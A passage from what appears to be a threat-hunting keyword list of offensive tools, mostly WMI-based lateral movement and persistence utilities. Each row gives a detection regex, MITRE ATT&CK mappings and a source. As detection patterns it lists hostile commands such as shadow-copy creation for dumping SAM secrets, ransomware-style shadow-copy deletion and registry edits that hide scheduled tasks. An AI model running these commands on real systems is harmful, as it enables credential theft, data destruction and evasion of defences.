Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*wl-lic -d *.dat -r *.rsa*",".{0,1000}wl\-lic\s\-d\s.{0,1000}\.dat\s\-r\s.{0,1000}\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - 
T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*",".{0,1000}wl\-lic\s\-h\sHWID\s\-m\smain_hash\s\-d\sregkey2\.dat\s\-r\sregkey2\.rsa.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","72","6","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z" "*wmap_crawler.rb*",".{0,1000}wmap_crawler\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*wmeye.csproj*",".{0,1000}wmeye\.csproj.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.exe *",".{0,1000}wmeye\.exe\s.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*wmeye.sln*",".{0,1000}wmeye\.sln.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","331","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" "*Wmi_Persistence.ps1*",".{0,1000}Wmi_Persistence\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","486","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" "*wmi_persistence.rb*",".{0,1000}wmi_persistence\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*WMIBackdoor.ps1*",".{0,1000}WMIBackdoor\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","create or remove a backdoor using WMI event subscriptions","T1546.003 - T1059.001 - T1102","TA0005 - TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","10","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*wmic /namespace:\\root\default path stdRegProv call DeleteValue *SOFTWARE\YourSoftware\Schedule\TaskCache\Tree\*=*SD*",".{0,1000}wmic\s\/namespace\:\\\\root\\default\spath\sstdRegProv\scall\sDeleteValue\s.{0,1000}SOFTWARE\\YourSoftware\\Schedule\\TaskCache\\Tree\\.{0,1000}\=.{0,1000}SD.{0,1000}","offensive_tool_keyword","wmic","the threat actor deleted the SD value within the Tree registry path (hide scheduled task creation)","T1562","TA0005","Tarrask Malware","HAFNIUM","Defense Evasion","https://www.microsoft.com/en-us/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/","1","0","risk of False positive","9","10","N/A","N/A","N/A","N/A" "*wmic shadowcopy call create Volume='C:\'*",".{0,1000}wmic\sshadowcopy\scall\screate\sVolume\=\'C\:\\\'.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. 
An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic.exe* Shadowcopy Delete*",".{0,1000}wmic\.exe.{0,1000}\sShadowcopy\sDelete.{0,1000}","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wmic/wmic.cmd*",".{0,1000}wmic\/wmic\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*WMIcmd*",".{0,1000}WMIcmd.{0,1000}","offensive_tool_keyword","WMIcmd","This tool allows us to execute commands via WMI and get information not otherwise available via this channel.","T1059.001 - T1021 - T1210.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/nccgroup/WMIcmd","1","1","N/A","N/A","4","326","77","2017-06-24T18:37:16Z","2017-05-17T06:50:12Z" "*WMICStager*",".{0,1000}WMICStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*wmi-event-lateral-movement.*",".{0,1000}wmi\-event\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMI-EventSub.cpp*",".{0,1000}WMI\-EventSub\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn 
windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*wmiexec *.exe*",".{0,1000}wmiexec\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WMIExec.git*",".{0,1000}WMIExec\.git.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation 
Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec.py -*",".{0,1000}wmiexec\.py\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WMIEXEC: Could not retrieve output file*",".{0,1000}WMIEXEC\:\sCould\snot\sretrieve\soutput\sfile.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*wmiexec\wmiexec.go*",".{0,1000}wmiexec\\wmiexec\.go.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "*wmiexec_scheduledjob.py*",".{0,1000}wmiexec_scheduledjob\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec_win32process.py*",".{0,1000}wmiexec_win32process\.py.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI 
protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec2.0.py*",".{0,1000}wmiexec2\.0\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*wmiexec2.py*",".{0,1000}wmiexec2\.py.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*wmiexec2-main*",".{0,1000}wmiexec2\-main.{0,1000}","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","20","1","2023-12-27T03:54:26Z","2023-02-07T22:10:08Z" "*WMIExecHash.*",".{0,1000}WMIExecHash\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*WMIExecHash.boo",".{0,1000}WMIExecHash\.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*WMIExec-main*",".{0,1000}WMIExec\-main.{0,1000}","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","157","25","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" "*wmiexec-Pro.git*",".{0,1000}wmiexec\-Pro\.git.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features 
whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmiexec-pro.py*",".{0,1000}wmiexec\-pro\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmiexec-Pro/tarball*",".{0,1000}wmiexec\-Pro\/tarball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmiexec-Pro/zipball*",".{0,1000}wmiexec\-Pro\/zipball.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmi-lateral-movement.*",".{0,1000}wmi\-lateral\-movement\..{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*WMImplant*",".{0,1000}WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*WMIPersist.*",".{0,1000}WMIPersist\..{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*wmipersist.py*",".{0,1000}wmipersist\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*wmipersistence.py*",".{0,1000}wmipersistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*WMIPersistence.vbs*",".{0,1000}WMIPersistence\.vbs.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*WMIPersistImplant*",".{0,1000}WMIPersistImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*WMI-ProcessCreate.cpp*",".{0,1000}WMI\-ProcessCreate\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*WMIReg.exe*",".{0,1000}WMIReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*wmispawn select*",".{0,1000}wmispawn\sselect.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*WmiSploit.git*",".{0,1000}WmiSploit\.git.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small 